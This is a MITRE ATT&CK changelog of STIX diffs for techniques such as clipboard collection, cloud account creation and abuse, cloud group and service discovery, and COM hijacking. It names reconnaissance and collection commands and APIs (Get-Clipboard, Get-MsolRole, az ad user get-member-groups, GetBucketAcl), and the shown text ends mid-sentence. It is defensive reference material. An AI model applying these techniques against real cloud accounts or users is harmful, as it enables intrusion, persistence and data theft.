external_referencesCISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-637
values_changed
STIX FieldOld valueNew Value
modified2020-04-23 18:35:58.230000+00:002023-04-14 21:51:47.277000+00:00
descriptionAdversaries may collect data stored in the clipboard from users copying information within or between applications. In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)Adversaries may collect data stored in the clipboard from users copying information within or between applications. For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs) macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)
external_references[1]['source_name']capecCISA_AA21_200B
external_references[1]['url']https://capec.mitre.org/data/definitions/637.htmlhttps://www.cisa.gov/uscert/ncas/alerts/aa21-200b
external_references[2]['source_name']MSDN Clipboardmining_ruby_reversinglabs
external_references[2]['description']Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.
external_references[2]['url']https://msdn.microsoft.com/en-us/library/ms649012https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems
external_references[3]['source_name']Operating with EmPyreclip_win_server
external_references[3]['description']rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.
external_references[3]['url']https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'MSDN Clipboard', 'description': 'Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.', 'url': 'https://msdn.microsoft.com/en-us/library/ms649012'}
external_references{'source_name': 'Operating with EmPyre', 'description': 'rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.', 'url': 'https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363'}

[T1136.003] Create Account: Cloud Account

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may create a cloud account to maintain access tot1Adversaries may create a cloud account to maintain access to
> victim systems. With a sufficient level of access, such acc> victim systems. With a sufficient level of access, such acc
>ounts may be used to establish secondary credentialed access>ounts may be used to establish secondary credentialed access
> that does not require persistent remote access tools to be > that does not require persistent remote access tools to be 
>deployed on the system.(Citation: Microsoft O365 Admin Roles>deployed on the system.(Citation: Microsoft O365 Admin Roles
>)(Citation: Microsoft Support O365 Add Another Admin, Octobe>)(Citation: Microsoft Support O365 Add Another Admin, Octobe
>r 2019)(Citation: AWS Create IAM User)(Citation: GCP Create >r 2019)(Citation: AWS Create IAM User)(Citation: GCP Create 
>Cloud Identity Users)(Citation: Microsoft Azure AD Users)  A>Cloud Identity Users)(Citation: Microsoft Azure AD Users)  A
>dversaries may create accounts that only have access to spec>dversaries may create accounts that only have access to spec
>ific cloud services, which can reduce the chance of detectio>ific cloud services, which can reduce the chance of detectio
>n.>n.  Once an adversary has created a cloud account, they can 
 >then manipulate that account to ensure persistence and allow
 > access to additional resources - for example, by adding [Ad
 >ditional Cloud Credentials](https://attack.mitre.org/techniq
 >ues/T1098/001) or assigning [Additional Cloud Roles](https:/
 >/attack.mitre.org/techniques/T1098/003).
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-07 13:09:30.819000+00:002023-03-06 21:24:56.669000+00:00
descriptionAdversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may obtain and abuse credentials of a cloud accot1Adversaries may obtain and abuse credentials of a cloud acco
>unt as a means of gaining Initial Access, Persistence, Privi>unt as a means of gaining Initial Access, Persistence, Privi
>lege Escalation, or Defense Evasion. Cloud accounts are thos>lege Escalation, or Defense Evasion. Cloud accounts are thos
>e created and configured by an organization for use by users>e created and configured by an organization for use by users
>, remote support, services, or for administration of resourc>, remote support, services, or for administration of resourc
>es within a cloud service provider or SaaS application. In s>es within a cloud service provider or SaaS application. In s
>ome cases, cloud accounts may be federated with traditional >ome cases, cloud accounts may be federated with traditional 
>identity management system, such as Window Active Directory.>identity management systems, such as Windows Active Director
>(Citation: AWS Identity Federation)(Citation: Google Federat>y.(Citation: AWS Identity Federation)(Citation: Google Feder
>ing GC)(Citation: Microsoft Deploying AD Federation)  Compro>ating GC)(Citation: Microsoft Deploying AD Federation)  Comp
>mised credentials for cloud accounts can be used to harvest >romised credentials for cloud accounts can be used to harves
>sensitive data from online storage accounts and databases. A>t sensitive data from online storage accounts and databases.
>ccess to cloud accounts can also be abused to gain Initial A> Access to cloud accounts can also be abused to gain Initial
>ccess to a network by abusing a [Trusted Relationship](https> Access to a network by abusing a [Trusted Relationship](htt
>://attack.mitre.org/techniques/T1199). Similar to [Domain Ac>ps://attack.mitre.org/techniques/T1199). Similar to [Domain 
>counts](https://attack.mitre.org/techniques/T1078/002), comp>Accounts](https://attack.mitre.org/techniques/T1078/002), co
>romise of federated cloud accounts may allow adversaries to >mpromise of federated cloud accounts may allow adversaries t
>more easily move laterally within an environment.  Once a cl>o more easily move laterally within an environment.  Once a 
>oud account is compromised, an adversary may perform [Accoun>cloud account is compromised, an adversary may perform [Acco
>t Manipulation](https://attack.mitre.org/techniques/T1098) ->unt Manipulation](https://attack.mitre.org/techniques/T1098)
> for example, by adding [Additional Cloud Roles](https://att> - for example, by adding [Additional Cloud Roles](https://a
>ack.mitre.org/techniques/T1098/003) - to maintain persistenc>ttack.mitre.org/techniques/T1098/003) - to maintain persiste
>e and potentially escalate their privileges.>nce and potentially escalate their privileges.

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 20:23:33.894000+00:002023-03-21 13:17:14.441000+00:00
descriptionAdversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]User Account: User Account AuthenticationLogon Session: Logon Session Creation
x_mitre_data_sources[2]Logon Session: Logon Session CreationUser Account: User Account Authentication
x_mitre_version1.41.5

[T1069.003] Permission Groups Discovery: Cloud Groups

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to find cloud groups and permission t1Adversaries may attempt to find cloud groups and permission 
>settings. The knowledge of cloud permission groups can help >settings. The knowledge of cloud permission groups can help 
>adversaries determine the particular roles of users and grou>adversaries determine the particular roles of users and grou
>ps within an environment, as well as which users are associa>ps within an environment, as well as which users are associa
>ted with a particular group.  With authenticated access ther>ted with a particular group.  With authenticated access ther
>e are several tools that can be used to find permissions gro>e are several tools that can be used to find permissions gro
>ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be >ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be 
>used to obtain roles and permissions groups for Exchange and>used to obtain roles and permissions groups for Exchange and
> Office 365 accounts (Citation: Microsoft Msolrole)(Citation> Office 365 accounts (Citation: Microsoft Msolrole)(Citation
>: GitHub Raindance).  Azure CLI (AZ CLI) and the Google Clou>: GitHub Raindance).  Azure CLI (AZ CLI) and the Google Clou
>d Identity Provider API also provide interfaces to obtain pe>d Identity Provider API also provide interfaces to obtain pe
>rmissions groups. The command <code>az ad user get-member-gr>rmissions groups. The command <code>az ad user get-member-gr
>oups</code> will list groups associated to a user account fo>oups</code> will list groups associated to a user account fo
>r Azure while the API endpoint <code>GET https://cloudidenti>r Azure while the API endpoint <code>GET https://cloudidenti
>ty.googleapis.com/v1/groups</code> lists group resources ava>ty.googleapis.com/v1/groups</code> lists group resources ava
>ilable to a user for Google.(Citation: Microsoft AZ CLI)(Cit>ilable to a user for Google.(Citation: Microsoft AZ CLI)(Cit
>ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: >ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: 
>Google Cloud Identity API Documentation)  Adversaries may at>Google Cloud Identity API Documentation) In AWS, the command
>tempt to list ACLs for objects to determine the owner and ot>s `ListRolePolicies` and `ListAttachedRolePolicies` allow us
>her accounts with access to the object, for example, via the>ers to enumerate the policies attached to a role.(Citation: 
> AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket>Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
> ACL). Using this information an adversary can target accoun> Adversaries may attempt to list ACLs for objects to deter
>ts with permissions to a given object or leverage accounts t>mine the owner and other accounts with access to the object,
>hey have already compromised to access the object.> for example, via the AWS <code>GetBucketAcl</code> API (Cit
 >ation: AWS Get Bucket ACL). Using this information an advers
 >ary can target accounts with permissions to a given object o
 >r leverage accounts they have already compromised to access 
 >the object.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 02:44:58.838000+00:002023-03-21 13:33:40.625000+00:00
descriptionAdversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
external_references[2]['source_name']Black Hills Red Teaming MS AD Azure, 2018Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
external_references[2]['description']Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.
external_references[2]['url']https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
external_references[3]['source_name']Google Cloud Identity API DocumentationBlack Hills Red Teaming MS AD Azure, 2018
external_references[3]['description']Google. (n.d.). Retrieved March 16, 2021.Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.
external_references[3]['url']https://cloud.google.com/identity/docs/reference/resthttps://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
external_references[4]['source_name']Microsoft AZ CLIGoogle Cloud Identity API Documentation
external_references[4]['description']Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.Google. (n.d.). Retrieved March 16, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latesthttps://cloud.google.com/identity/docs/reference/rest
external_references[5]['source_name']Microsoft MsolroleMicrosoft AZ CLI
external_references[5]['description']Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
external_references[5]['url']https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
external_references[6]['source_name']GitHub RaindanceMicrosoft Msolrole
external_references[6]['description']Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.
external_references[6]['url']https://github.com/True-Demon/raindancehttps://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Group: Group EnumerationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionApplication Log: Application Log Content
x_mitre_data_sources[4]Application Log: Application Log ContentGroup: Group Enumeration
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GitHub Raindance', 'description': 'Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.', 'url': 'https://github.com/True-Demon/raindance'}

[T1552.005] Unsecured Credentials: Cloud Instance Metadata API

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:37:23.589000+00:002023-03-21 13:56:27.910000+00:00
external_references[2]['source_name']Krebs Capital One August 2019RedLock Instance Metadata API 2018
external_references[2]['description']Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.
external_references[2]['url']https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse
external_references[3]['source_name']RedLock Instance Metadata API 2018Krebs Capital One August 2019
external_references[3]['description']Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.
external_references[3]['url']https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horsehttps://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
x_mitre_version1.31.4

[T1526] Cloud Service Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An adversary may attempt to enumerate the cloud services runt1An adversary may attempt to enumerate the cloud services run
>ning on a system after gaining access. These methods can dif>ning on a system after gaining access. These methods can dif
>fer from platform-as-a-service (PaaS), to infrastructure-as->fer from platform-as-a-service (PaaS), to infrastructure-as-
>a-service (IaaS), or software-as-a-service (SaaS). Many serv>a-service (IaaS), or software-as-a-service (SaaS). Many serv
>ices exist throughout the various cloud providers and can in>ices exist throughout the various cloud providers and can in
>clude Continuous Integration and Continuous Delivery (CI/CD)>clude Continuous Integration and Continuous Delivery (CI/CD)
>, Lambda Functions, Azure AD, etc.   Adversaries maattempt>, Lambda Functions, Azure AD, etc. Themay also include sec
> to discover information about the services enabled througho>urity services, such as AWS GuardDuty and Microsoft Defender
>ut the environment. Azure tools and APIs, such as the Azure > for Cloud, and logging services, such as AWS CloudTrail and
>AD Graph API and Azure Resource Manager API, can enumerate r> Google Cloud Audit Logs.  Adversaries may attempt to discov
>esources and services, including applications, management gr>er information about the services enabled throughout the env
>oups, resources and policy definitions, and their relationsh>ironment. Azure tools and APIs, such as the Azure AD Graph A
>ips that are accessible by an identity.(Citation: Azure - Re>PI and Azure Resource Manager API, can enumerate resources a
>source Manager API)(Citation: Azure AD Graph API)  Stormspot>nd services, including applications, management groups, reso
>ter is an open source tool for enumerating and constructing >urces and policy definitions, and their relationships that a
>a graph for Azure resources and services, and Pacu is an ope>re accessible by an identity.(Citation: Azure - Resource Man
>n source AWS exploitation framework that supports several me>ager API)(Citation: Azure AD Graph API)  For example, Storms
>thods for discovering cloud services.(Citation: Azure - Stor>potter is an open source tool for enumerating and constructi
>mspotter)(Citation: GitHub Pacu)>ng a graph for Azure resources and services, and Pacu is an 
 >open source AWS exploitation framework that supports several
 > methods for discovering cloud services.(Citation: Azure - S
 >tormspotter)(Citation: GitHub Pacu)  Adversaries may use the
 > information gained to shape follow-on behaviors, such as ta
 >rgeting data or credentials from enumerated services or evad
 >ing identified defenses through [Disable or Modify Tools](ht
 >tps://attack.mitre.org/techniques/T1562/001) or [Disable Clo
 >ud Logs](https://attack.mitre.org/techniques/T1562/008).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-16 12:57:03.837000+00:002023-04-11 20:33:55.356000+00:00
descriptionAn adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu) Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).
external_references[1]['source_name']Azure - Resource Manager APIAzure AD Graph API
external_references[1]['description']Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.
external_references[1]['url']https://docs.microsoft.com/en-us/rest/api/resources/https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview
external_references[2]['source_name']Azure AD Graph APIAzure - Resource Manager API
external_references[2]['description']Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.
external_references[2]['url']https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overviewhttps://docs.microsoft.com/en-us/rest/api/resources/
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsThanabodi

[T1059] Command and Scripting Interpreter

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 18:31:48.827000+00:002023-03-27 16:43:58.795000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Module: Module LoadProcess: Process Creation
x_mitre_data_sources[3]Script: Script ExecutionModule: Module Load
x_mitre_data_sources[4]Command: Command ExecutionScript: Script Execution
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsOffice 365
x_mitre_platformsAzure AD
x_mitre_platformsIaaS
x_mitre_platformsGoogle Workspace

[T1218.001] System Binary Proxy Execution: Compiled HTML File

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-11 18:59:36.836000+00:002023-04-21 12:23:17.694000+00:00
external_references[1]['source_name']Microsoft HTML Help May 2018Microsoft CVE-2017-8625 Aug 2017
external_references[1]['description']Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.
external_references[1]['url']https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdkhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625
external_references[2]['source_name']Microsoft HTML Help ActiveXMicrosoft HTML Help May 2018
external_references[2]['description']Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.
external_references[2]['url']https://msdn.microsoft.com/windows/desktop/ms644670https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
external_references[4]['source_name']MsitPros CHM Aug 2017Microsoft HTML Help ActiveX
external_references[4]['description']Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.
external_references[4]['url']https://msitpros.com/?p=3909https://msdn.microsoft.com/windows/desktop/ms644670
external_references[5]['source_name']Microsoft CVE-2017-8625 Aug 2017MsitPros CHM Aug 2017
external_references[5]['description']Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.
external_references[5]['url']https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625https://msitpros.com/?p=3909
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1546.015] Event Triggered Execution: Component Object Model Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:19:44.750000+00:002023-04-21 12:34:29.402000+00:00
external_references[1]['source_name']Microsoft Component Object ModelElastic COM Hijacking
external_references[1]['description']Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.
external_references[1]['url']https://msdn.microsoft.com/library/ms694363.aspxhttps://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com
external_references[3]['source_name']Elastic COM HijackingMicrosoft Component Object Model
external_references[3]['description']Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.
external_references[3]['url']https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-comhttps://msdn.microsoft.com/library/ms694363.aspx
x_mitre_data_sources[0]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[3]Module: Module LoadProcess: Process Creation
x_mitre_version1.01.1

[T1586] Compromise Accounts

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may compromise accounts with services that can bt1Adversaries may compromise accounts with services that can b
>e used during targeting. For operations incorporating social>e used during targeting. For operations incorporating social
> engineering, the utilization of an online persona may be im> engineering, the utilization of an online persona may be im
>portant. Rather than creating and cultivating accounts (i.e.>portant. Rather than creating and cultivating accounts (i.e.
> [Establish Accounts](https://attack.mitre.org/techniques/T1> [Establish Accounts](https://attack.mitre.org/techniques/T1
>585)), adversaries may compromise existing accounts. Utilizi>585)), adversaries may compromise existing accounts. Utilizi
>ng an existing persona may engender a level of trust in a po>ng an existing persona may engender a level of trust in a po
>tential victim if they have a relationship, or knowledge of,>tential victim if they have a relationship, or knowledge of,
> the compromised persona.   A variety of methods exist for c> the compromised persona.   A variety of methods exist for c
>ompromising accounts, such as gathering credentials via [Phi>ompromising accounts, such as gathering credentials via [Phi
>shing for Information](https://attack.mitre.org/techniques/T>shing for Information](https://attack.mitre.org/techniques/T
>1598), purchasing credentials from third-party sites, or b>1598), purchasing credentials from third-party sites, brute 
>brute forcing credentials (ex: password reuse from breach cr>forcing credentials (ex: password reuse from breach credenti
>edential dumps).(Citation: AnonHBGary) Prior to compromising>al dumps), or paying employees, suppliers or business partne
> accounts, adversaries may conduct Reconnaissance to inform >rs for access to credentials.(Citation: AnonHBGary)(Citation
>decisions about which accounts to compromise to further thei>: Microsoft DEV-0537) Prior to compromising accounts, advers
>r operation.  Personas may exist on a single site or across >aries may conduct Reconnaissance to inform decisions about w
>multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc>hich accounts to compromise to further their operation.  Per
>.). Compromised accounts may require additional development,>sonas may exist on a single site or across multiple sites (e
> this could include filling out or modifying profile informa>x: Facebook, LinkedIn, Twitter, Google, etc.). Compromised a
>tion, further developing social networks, or incorporating p>ccounts may require additional development, this could inclu
>hotos.  Adversaries may directly leverage compromised email >de filling out or modifying profile information, further dev
